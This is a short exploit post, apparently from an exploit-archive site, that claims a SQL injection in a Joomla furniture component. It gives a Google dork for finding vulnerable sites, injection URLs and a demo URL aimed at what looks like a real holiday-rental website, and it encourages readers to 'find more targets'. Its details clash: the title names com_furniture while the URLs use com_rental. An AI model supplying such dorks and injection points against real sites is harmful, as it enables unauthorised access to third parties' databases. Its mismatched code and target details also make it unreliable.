###
# Title : Exploit Joomla com_furniture Sql Injection
# Author : Dz MinD Injector
# Home : Algeria 23000 d^_^b
# FaCeb0ok : https://www.facebook.com/Dz.MinD.Injector
# Type : proof of concept
# Tested on : Windows7 & Linux
# Date : 18/01/2016
###
# <?php
# echo " Freedom t0 Palastine " ;
# ?>
# Lov3 Explo8ting Just For Fun !
######## [ Proof / Exploit ] ################|=>
#! Google Dork :
#+ inurl:com_furniture
hp-code ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
$query = "SELECT * FROM ".$db->quote_id($_GET['table'])." WHERE ROWID = ".$pks[$j];
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
/index.php?option=com_rental&task=viewDetails&view=rental&id=40&year=1943&Itemid=[ Inject Here ]
http://localhost//index.php?option=com_rental&task=viewDetails&view=rental&id=40&year=1943&Itemid=[ Inject Here ]
##Demo :
http://www.nerjahoXlidayrentals.com/index.php?option=com_rental&task=viewDetails&view=rental&id=40&year=1943&Itemid=10%27
!+ Find More targets in Google ^_^
!+ Greetings to my Friends : Sige-Dz , Sami Joker , Vatou-Dz & All Algerian Hackerz !